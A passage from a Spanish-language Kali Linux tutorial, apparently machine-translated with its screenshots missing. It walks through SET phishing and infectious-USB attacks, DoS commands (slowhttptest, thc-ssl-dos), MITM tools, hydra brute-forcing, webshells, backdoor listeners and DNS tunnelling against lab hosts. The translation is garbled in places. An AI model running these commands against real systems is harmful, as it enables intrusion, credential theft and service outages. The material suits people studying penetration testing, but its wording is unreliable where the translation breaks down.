decir, no tiene que esperar un error, detener el programa, reiniciarlo desde
una nueva posición, etc.
Si usa la función mapfile de ddrescue, los datos se rescatan de manera muy
eficiente (solo se leen los bloques necesarios). Además, puede interrumpir el
rescate en cualquier momento y reanudarlo más tarde en el mismo punto. El
archivo de mapas es una parte esencial de la eficacia de ddrescue. Úselo a
menos que sepa lo que está haciendo.
La línea de comando es -
dd_rescue infilepath outfilepath
El parámetro "–v" significa detallado. "/ dev / sdb" es la carpeta a
rescatar. El archivo img es la imagen recuperada.
DFF
Es otra herramienta forense que se utiliza para recuperar los
archivos. También tiene una GUI. Para abrirlo, escriba "dff-gui" en la
terminal y se abrirá la siguiente GUI web.

Haga clic en Archivo → “Abrir evidencia”.


Se abrirá la siguiente tabla. Marque "Formato sin procesar" y haga clic en
"+" para seleccionar la carpeta que desea recuperar.

Luego, puede examinar los archivos a la izquierda del panel para ver qué se
ha recuperado.
Kali Linux - Ingeniería social
En este capítulo, aprenderemos sobre las herramientas de ingeniería social
utilizadas en Kali Linux.
Uso del kit de herramientas de ingeniería social
El Social-Engineer Toolkit (SET) es un marco de pruebas de penetración
de código abierto diseñado para la ingeniería social. SET tiene varios
vectores de ataque personalizados que le permiten realizar un ataque creíble
en una fracción de tiempo. Este tipo de herramientas utilizan
comportamientos humanos para engañarlos a los vectores de ataque.
Aprendamos a usar el kit de herramientas de ingeniería social.
Paso 1 - Para abrir SET, vaya a Aplicaciones → Herramientas de ingeniería
social → Haga clic en "SET" Herramienta de ingeniería social.

Paso 2 : le preguntará si está de acuerdo con los términos de


uso. Escriba "y" como se muestra en la siguiente captura de pantalla.
Paso 3 : la mayoría de los menús que se muestran en la siguiente captura de
pantalla se explican por sí mismos y, entre ellos, el más importante es el
número 1 "Ataques de ingeniería social".
Paso 4 : escriba “1” → Enter. Se abrirá un submenú. Si presiona
el botón Enter nuevamente, verá las explicaciones de cada submenú.
El módulo Spear-phishing le permite crear mensajes de correo electrónico
especialmente y enviarlos a sus víctimas objetivo con cargas
útiles FileFormatmalicious adjuntas . Por ejemplo, enviar un documento
PDF malicioso que si la víctima abre, comprometerá el sistema. Si desea
falsificar su dirección de correo electrónico, asegúrese de que "Sendmail"
esté instalado (apt-get install sendmail) y cambie el indicador config /
set_config SENDMAIL = OFF a SENDMAIL = ON.
Hay dos opciones para el ataque de spear phishing:
Realizar un ataque masivo por correo electrónico
Cree una carga útil de FileFormat y una plantilla de ingeniería social
El primero es dejar que SET haga todo por usted (opción 1), el segundo es
crear su propia carga útil FileFormat y usarlo en su propio ataque.
Escriba "99" para volver al menú principal y luego escriba "2" para ir a
"Los vectores de ataque web".
El módulo de ataque web es una forma única de utilizar múltiples ataques
basados en web para comprometer a la víctima prevista. Este módulo se
utiliza para realizar ataques de phishing contra la víctima si hace clic en el
enlace. Existe una amplia variedad de ataques que pueden ocurrir una vez
que hacen clic en un enlace.
Escriba "99" para volver al menú principal y luego escriba "3" .
El módulo USB / CD / DVD infeccioso creará un archivo autorun.inf y una
carga útil Metasploit. El archivo de carga útil y ejecución automática se
graba o copia en un USB. Cuando se inserta un DVD / USB / CD en la
máquina de la víctima, activará una función de ejecución automática (si la
ejecución automática está habilitada) y, con suerte, comprometerá el
sistema. Puede elegir el vector de ataque que desea utilizar: errores de
formato de archivo o un ejecutable directo.
A continuación se muestran las opciones para Infectious Media Generator.
Exploits de formato de archivo
Ejecutable estándar de Metasploit
Escriba "99" para volver al menú principal. Luego, escriba "4" para ir a
"Los vectores de ataque web".
La carga útil de creación y el oyente es una forma sencilla de crear una carga
útil de Metasploit. Exportará el archivo exe por usted y generará un
oyente. Debería convencer a la víctima de que descargue el archivo exe y lo
ejecute para obtener el shell.

Escriba "99" para volver al menú principal y luego escriba "5" para ir a
"Los vectores de ataque web".
El ataque de correo masivo le permitirá enviar múltiples correos electrónicos
a las víctimas y personalizar los mensajes. Hay dos opciones en el envío
masivo de correos electrónicos; el primero es enviar un correo electrónico a
una única dirección de correo electrónico. La segunda opción le permite
importar una lista que tiene todos los correos electrónicos de los
destinatarios y enviará su mensaje a tantas personas como desee dentro de
esa lista.
Ataque de correo electrónico Dirección de correo electrónico única
Envío masivo de ataques por correo electrónico
Escriba "99" para volver al menú principal y luego escriba "9" para ir a
"Powershell Attack Vector".

El módulo Vector de ataque de Powershell le permite crear ataques


específicos de PowerShell. Estos ataques le permiten utilizar PowerShell,
que está disponible de forma predeterminada en todos los sistemas
operativos Windows Vista y superior. PowerShell proporciona un panorama
fructífero para implementar cargas útiles y realizar funciones que no se
activan con tecnologías preventivas.
Inyector de Shellcode alfanumérico Powershell
Carcasa inversa Powershell
Caparazón de enlace de Powershell
Base de datos SAM de volcado de Powershell
Kali Linux - Herramientas de estrés
Las herramientas de estrés se utilizan para crear ataques DoS o para crear la
prueba de estrés para diferentes aplicaciones a fin de tomar las medidas
adecuadas para el futuro.
Todas las herramientas de pruebas de estrés se encuentran en Aplicaciones
→ 02-Análisis de vulnerabilidad → Pruebas de estrés.

Todas las pruebas de estrés se realizarán en una máquina metsploitable que


tiene una IP de 192.168.1.102
Slowhttptest
Slowhttptest es una de las herramientas de ataque DoS. Especialmente
utiliza el protocolo HTTP para conectarse con el servidor y mantener
ocupados los recursos como CPU y RAM. Veamos en detalle cómo usarlo y
explicamos sus funciones.
Para abrir slowhttptest, primero abra la terminal y escriba “slowhttptest –
parameters” .
Puede escribir “slowhttptest –h” para ver todos los parámetros que necesita
usar. En caso de que reciba un resultado, 'Comando no encontrado', primero
debe escribir "apt-get install slowhttptest" .

Luego, después de la instalación, vuelva a escribir slowhttptest –h

Escriba el siguiente comando:


slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u
http://192.168.1.202/index.php -x 24 -p 2
Dónde,
(-c 500) = 500 conexiones
(-H) = modo Slowloris
-g = Generar estadísticas
-o outputfile = Nombre del archivo de salida
-i 10 = Usa 10 segundos para esperar datos
-r 200 = 200 conexiones con -t GET = solicitudes GET
-u http://192.168.1.202/index.php = URL de destino
-x 24 = longitud máxima de 24 bytes
-p 2 = tiempo de espera de 2 segundos

Una vez que comience la prueba, la salida será como se muestra en la


siguiente captura de pantalla, donde puede notar que el servicio está
disponible.
Después de un tiempo, en la conexión 287, el servicio se cae. Esto significa
que el servidor puede manejar un máximo de 287 conexiones HTTP.
Inviteflood
Inviteflood es un mensaje SIP / SDP INVITE inundado por UDP / IP. Se
ejecuta en una variedad de distribuciones de Linux. Realiza ataques DoS
(Denial of Service) contra dispositivos SIP mediante el envío de múltiples
solicitudes INVITE.
Para abrir Inviteflood, primero abra la terminal y escriba "inviteflood –
parameters"
Para obtener ayuda, puede utilizar "inviteflood –h"

A continuación, puede usar el siguiente comando:


inviteflood eth0 target_extension target_domain target_ip
number_of_packets
Dónde,
target_extension es 2000
target_domain es 192.168.xx
target_ip es 192.168.xx
number_of_packets es 1
-a es el alias de la cuenta SIP
Iaxflood
Iaxflood es una herramienta de VoIP DoS. Para abrirlo, escriba “iaxflood
sourcename destinationname numpackets” en la terminal.
Para saber cómo usarlo, escriba "iaxflood –h"
thc-ssl-dos
THC-SSL-DOS es una herramienta para verificar el rendimiento de SSL. El
establecimiento de una conexión SSL segura requiere 15 veces más potencia
de procesamiento en el servidor que en el cliente. THCSSL-DOS explota
esta propiedad asimétrica al sobrecargar el servidor y sacarlo de Internet.
A continuación se muestra el comando:
thc-ssl-dos victimIP httpsport –accept
En este ejemplo, será:
thc-ssl-dos 192.168.1.1 443 –accept
Su salida sería la siguiente:
Kali Linux: rastreo y suplantación
El concepto básico de herramientas de rastreo es tan simple como escuchas
telefónicas y Kali Linux tiene algunas herramientas populares para este
propósito. En este capítulo, aprenderemos sobre las herramientas de rastreo y
suplantación de identidad disponibles en Kali.
Burpsuite
Burpsuite se puede utilizar como una herramienta de rastreo entre su
navegador y los servidores web para encontrar los parámetros que utiliza la
aplicación web.
Para abrir Burpsuite, vaya a Aplicaciones → Análisis de aplicaciones web
→ burpsuite.

Para realizar la configuración de sniffing, configuramos burpsuite para que


se comporte como un proxy. Para hacer esto, vaya a Opciones como se
muestra en la siguiente captura de pantalla. Marque la casilla como se
muestra.
En este caso, la IP del proxy será 127.0.0.1 con el puerto 8080.

Luego configure el proxy del navegador, que es la IP de la máquina


burpsuite y el puerto.
Para iniciar la interceptación, vaya a Proxy → Interceptar → haga clic en
"La intercepción está activada".
Continúe navegando en la página web en la que desea encontrar el parámetro
para probar las vulnerabilidades.
En este caso, es una máquina metasploitable con IP 192.168.1.102

Vaya a "Historial HTTP". En la siguiente captura de pantalla, la línea


marcada con una flecha roja muestra la última solicitud. En Raw y el
parámetro oculto como el ID de sesión y otros parámetros como el nombre
de usuario y la contraseña se ha subrayado en rojo.
mitmproxy
mitmproxy es un proxy HTTP man-in-the-middle con capacidad
SSL. Proporciona una interfaz de consola que permite inspeccionar y editar
los flujos de tráfico sobre la marcha.
Para abrirlo, vaya a la terminal y escriba “mitmproxy -parameter” y para
obtener ayuda sobre los comandos, escriba “mitmproxy –h” .

Para iniciar mitmproxy, escriba “mitmproxy –p número de puerto” . En


este caso, es “mitmproxy –p 80”.
Wireshark
Wireshark es uno de los mejores analizadores de paquetes de datos. Analiza
en profundidad los paquetes a nivel de trama. Puede obtener más
información sobre Wireshark en su página web
oficial: https://www.wireshark.org/ . En Kali, se encuentra utilizando la
siguiente ruta: Aplicaciones → Detección y suplantación de identidad →
Wirehark.

Una vez que haga clic en wirehark, se abrirá la siguiente GUI.


Haga clic en "Inicio" y la captura de paquetes comenzará como se muestra
en la siguiente captura de pantalla.
sslstrip
sslstrip es un ataque MITM que obliga al navegador de la víctima a
comunicarse en texto plano a través de HTTP, y los proxies modifican el
contenido de un servidor HTTPS. Para hacer esto, sslstrip está "quitando" las
URL https: // y convirtiéndolas en URL http: //.
Para abrirlo, vaya a Aplicaciones → 09-Sniffing & Spoofing → Spoofing y
MITM → sslstrip.
Para configurarlo, escriba para reenviar toda la comunicación de 80 puertos
al 8080.

Luego, inicie el comando sslstrip para el puerto necesario.


Kali Linux - Herramientas para descifrar
contraseñas
En este capítulo, aprenderemos sobre las importantes herramientas de
descifrado de contraseñas utilizadas en Kali Linux.
Hidra
Hydra es un cracker de inicio de sesión que admite muchos protocolos para
atacar (Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -
FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD,
HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle
Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP,
Rexec, Rlogin , Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1 + v2
+ v3, SOCKS5, SSH (v1 y v2), SSHKEY, Subversion, Teamspeak (TS2),
Telnet, VMware-Auth, VNC y XMPP) .
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → Ataques en
línea → hydra.

Abrirá la consola del terminal, como se muestra en la siguiente captura de


pantalla.
En este caso, utilizaremos el servicio FTP de fuerza bruta de la máquina
metasploitable, que tiene IP 192.168.1.101

Hemos creado en Kali una lista de palabras con la extensión 'lst' en la


ruta usr \ share \ wordlist \ metasploit .

El comando será el siguiente:


hydra -l /usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V
donde –V es el nombre de usuario y la contraseña al intentar

Como se muestra en la siguiente captura de pantalla, se encuentran el


nombre de usuario y la contraseña que son msfadmin: msfadmin
Johnny
Johnny es una GUI para la herramienta de descifrado de contraseñas de
John the Ripper. Generalmente, se usa para contraseñas débiles.
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → johnny.

En este caso, obtendremos la contraseña de la máquina Kali con el siguiente


comando y se creará un archivo en el escritorio.

Haga clic en "Abrir archivo Passwd" → Aceptar y todos los archivos se


mostrarán como en la siguiente captura de pantalla.
Haga clic en "Iniciar ataque".

Una vez que se complete el ataque, haga clic en el panel izquierdo en


"Contraseñas" y la contraseña no estará sombreada.
John
john es una versión de línea de comandos de Johnny GUI. Para iniciarlo,
abra la Terminal y escriba "john" .

En caso de quitar la sombra de la contraseña, debemos escribir el siguiente


comando:
root@kali:~# unshadow passwd shadow > unshadowed.txt
Rainbowcrack
El software RainbowCrack descifra hashes mediante la búsqueda de tablas
de arco iris. Las tablas Rainbow son archivos ordinarios almacenados en el
disco duro. Generalmente, las tablas Rainbow se compran en línea o se
pueden compilar con diferentes herramientas.
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → haga clic en
“rainbowcrack”.

El comando para descifrar una contraseña hash es:


rcrack path_to_rainbow_tables -f path_to_password_hash
SQLdict
Es una herramienta de ataque de diccionario para servidor SQL y es muy
fácil y básica de usar. Para abrirlo, abra la terminal y
escriba "sqldict" . Abrirá la siguiente vista.

En "Servidor IP de destino", ingrese la IP del servidor que contiene el


SQL. En "Cuenta de destino", ingrese el nombre de usuario. Luego cargue el
archivo con la contraseña y haga clic en "iniciar" hasta que finalice.
identificador de hash
Es una herramienta que se utiliza para identificar tipos de hashes, es decir,
para qué se utilizan. Por ejemplo, si tengo un HASH, puede decirme si es un
HASH de Linux o de Windows.

La pantalla anterior muestra que puede ser un hash MD5 y parece una
credencial en caché de dominio.
Kali Linux: mantenimiento del acceso
En este capítulo, veremos las herramientas que usa Kali para mantener la
conexión y para acceder a una máquina pirateada incluso cuando se conecta
y desconecta nuevamente.
Powersploit
Esta es una herramienta para máquinas Windows. Tiene PowerShell
instalado en la máquina de las víctimas. Esta herramienta ayuda al pirata
informático a conectarse con la máquina de la víctima a través de
PowerShell.
Para abrirlo, abra el terminal de la izquierda y escriba el siguiente comando
para ingresar a la carpeta powersploit:
cd /usr/share/powersploit/
Si escribe "ls" , aparecerá una lista de todas las herramientas de powersploit
que puede descargar e instalar en la máquina de la víctima después de haber
obtenido acceso. La mayoría de ellos se autoexplican de acuerdo con sus
nombres.

Una forma fácil de descargar esta herramienta en la máquina de la víctima es


crear un servidor web, que las herramientas de powersploit permiten crear
fácilmente usando el siguiente comando:
python -m SimpleHTTPServer

Después de esto, si escribe: http: // <dirección_ip de la máquina Kali>: 8000


/ siguiente es el resultado.
Sbd
sbd es una herramienta similar a Netcat. Es portátil y se puede utilizar en
máquinas Linux y Microsoft. sbd cuenta con cifrado AES-CBC-128 +
HMAC-SHA1> Básicamente, ayuda a conectarse a la máquina de una
víctima en cualquier momento en un puerto específico y enviar comandos de
forma remota.
Para abrirlo, vaya a la terminal y escriba "sbd -l -p puerto" para que el
servidor acepte conexiones.

En este caso, pongamos el puerto 44 donde escuchará el servidor.

En el sitio de la víctima, escriba "sbd IPofserver port" . Se establecerá una


conexión donde podremos enviar los comandos remotos.
En este caso, es “localhost” ya que hemos realizado la prueba en la misma
máquina.

Finalmente, en el servidor verá que se ha producido una conexión como se


muestra en la siguiente captura de pantalla.
Webshells
Los Webshells se pueden utilizar para mantener el acceso o para piratear un
sitio web. Pero la mayoría de ellos son detectados por antivirus. El shell php
C99 es muy conocido entre los antivirus. Cualquier antivirus común lo
detectará fácilmente como malware.
Generalmente, su función principal es enviar comandos del sistema a través
de interfaces web.
Para abrirlo, escriba "cd / usr / share / webshells /" en la terminal.

Como ves, se dividen en clases según el lenguaje de programación: asp,


aspx, cfm, jsp, perl, php
Si ingresa en la carpeta PHP, puede ver todas las carcasas web de las páginas
web php.

Para cargar el shell en un servidor web, por ejemplo, "simple-


backdoor.php" abra la página web y la URL del shell web.
Al final, escriba el comando cmd. Tendrá toda la información mostrada
como en la siguiente captura de pantalla.
Weevely
Weevely es un shell web PHP que simula una conexión similar a telnet. Es
una herramienta para la explotación posterior de aplicaciones web y se
puede utilizar como una puerta trasera sigilosa o como un shell web para
administrar cuentas web legítimas, incluso las alojadas de forma gratuita.
Para abrirlo, vaya a la terminal y escriba "weevely" donde puede ver su uso.

Para generar el shell, escriba "weevely generate password


pathoffile" . Como se ve en la siguiente captura de pantalla, se genera en la
carpeta "Escritorio" y el archivo se carga en un servidor web para obtener
acceso.
Después de cargar el shell web como se muestra en la siguiente captura de
pantalla, podemos conectarnos con cmd al servidor usando el
comando "contraseña de URL de weevely" donde puede ver que se ha
iniciado una sesión.
http-tunel
http-tunnel crea un flujo de datos virtual bidireccional tunelizado en
solicitudes HTTP. Las solicitudes se pueden enviar a través de un proxy
HTTP si así se desea. Esto puede resultar útil para los usuarios que se
encuentran detrás de firewalls restrictivos. Si se permite el acceso a la
WWW a través de un proxy HTTP, es posible utilizar http-tunnel y telnet o
PPP para conectarse a una computadora fuera del firewall.
Primero, deberíamos crear un servidor de túnel con el siguiente comando:
httptunnel_server –h
Luego, en el sitio del cliente, escriba “httptunnel_client –h” y ambos
comenzarán a aceptar conexiones.
dns2tcp
Esta es nuevamente una herramienta de tunelización que ayuda a pasar el
tráfico TCP a través del tráfico DNS, lo que significa puerto UDP 53.
Para iniciarlo, escriba "dns2tcpd" . El uso se explica cuando abre el script.

En el sitio del servidor, ingrese este comando para configurar el archivo.


#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
En el sitio del Cliente, ingrese este comando.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
La tunelización comenzará con este comando.
gato cript
Es otra herramienta como Netcat que permite realizar una conexión TCP y
UDP con la máquina de una víctima de forma encriptada.
Para iniciar un servidor para escuchar una conexión, escriba el siguiente
comando:
cryptcat –l –p port –n

Dónde,
-l significa escuchar una conexión
-p significa parámetro de número de puerto
-n significa no hacer la resolución de nombres
En el sitio del cliente, el comando de conexión es "cryptcat IPofServer
PortofServer"
Kali Linux - Ingeniería inversa
En este capítulo, aprenderemos sobre las herramientas de ingeniería inversa
de Kali Linux.
OllyDbg
OllyDbg es un depurador de análisis de nivel de ensamblador de 32 bits para
aplicaciones de Microsoft Windows. El énfasis en el análisis de código
binario lo hace particularmente útil en los casos en que la fuente no está
disponible. Generalmente, se usa para descifrar los softwares comerciales.
Para abrirlo, vaya a Aplicaciones → Ingeniería inversa → ollydbg

Para cargar un archivo EXE, vaya a la "Carpeta de apertura" en color


amarillo, que se muestra en un cuadrado rojo en la captura de pantalla
anterior.
Después de la carga, tendrá la siguiente vista donde puede cambiar los
binarios.
dex2jar
Esta es una aplicación que ayuda a convertir archivos APK (android) a
archivos JAR para ver el código fuente. Para usarlo, abra el terminal y
escriba ”d2j-dex2jar –d / ubicación del archivo” .
En este caso, el archivo es "classes.dex" en el escritorio.

La siguiente línea muestra que se ha creado un archivo JAR.


jd-gui
JD-GUI es una utilidad gráfica independiente que muestra códigos fuente
Java de archivos ".class" . Puede navegar por el código fuente
reconstruido. En este caso, podemos reconstruir el archivo que extrajimos de
la herramienta dex2jar.
Para ejecutarlo, abra la terminal y escriba “jd-gui” y se abrirá la siguiente
vista.
Para importar el archivo, haga clic en el icono de carpeta abierta en la
esquina superior izquierda y luego importe el archivo.
apktool
Apktool es una de las mejores herramientas para revertir toda la aplicación
de Android. Puede decodificar recursos a una forma casi original y
reconstruirlos después de realizar modificaciones.
Para abrirlo, ve a la terminal y escribe "apktool" .
Para descompilar un archivo apk, escriba "apktool d archivo apk" .

La descompilación comenzará como se muestra en la siguiente captura de


pantalla.
Kali Linux: herramientas de informes
En este capítulo, aprenderemos sobre algunas herramientas de informes en
Kali Linux.
Dradis
En todo este trabajo que hemos realizado, es importante compartir los
resultados que se produjeron, hacer un seguimiento de nuestro trabajo, etc.
Para ello, Kali cuenta con una herramienta de informes llamada dradis que
es un servicio web.
Paso 1 : para iniciar Dradis, escriba "service dradis start" .

Paso 2 : para abrir, vaya a Aplicaciones → Herramientas de informes →


dradis.

Se abrirá la URL web. Cualquiera en LAN puede abrirlo en la siguiente


URL https: // IP de la máquina kali: 3004
Inicie sesión con el nombre de usuario y la contraseña que se utilizó por
primera vez.
Paso 3 : después de iniciar sesión, puede importar archivos de NMAP,
NESSUS, NEXPOSE. Para hacerlo, vaya a "Importar desde archivo" →
haga clic en "nuevo importador (con comentarios en tiempo real)".

Paso 4 : seleccione el tipo de archivo que desea cargar. En este caso, es


“Nessus scan” → haga clic en “Examinar”.
Si va a la página de inicio ahora, en el panel izquierdo verá que los escaneos
importados están en una carpeta con sus detalles de puerto y host.
Metagoofil
Metagoofil realiza una búsqueda en Google para identificar y descargar los
documentos al disco local y luego extrae los metadatos. Extrae metadatos de
documentos públicos pertenecientes a una determinada empresa, individuo,
objeto, etc.
Para abrirlo, vaya a: "usr / share / metagoofil /" .

Para comenzar a buscar, escriba el siguiente comando:


python metagoofil.py
Puede utilizar los siguientes parámetros con este comando:
–D (nombre de dominio)
–T (tipo de archivo para descargar dox, pdf, etc.)
–L (limitar los resultados a 10, 100)
–N (limitar archivos para descargar)
–O (ubicación para guardar los archivos)
–F (archivo de salida)
El siguiente ejemplo muestra que solo el nombre de dominio está oculto.

También podría gustarte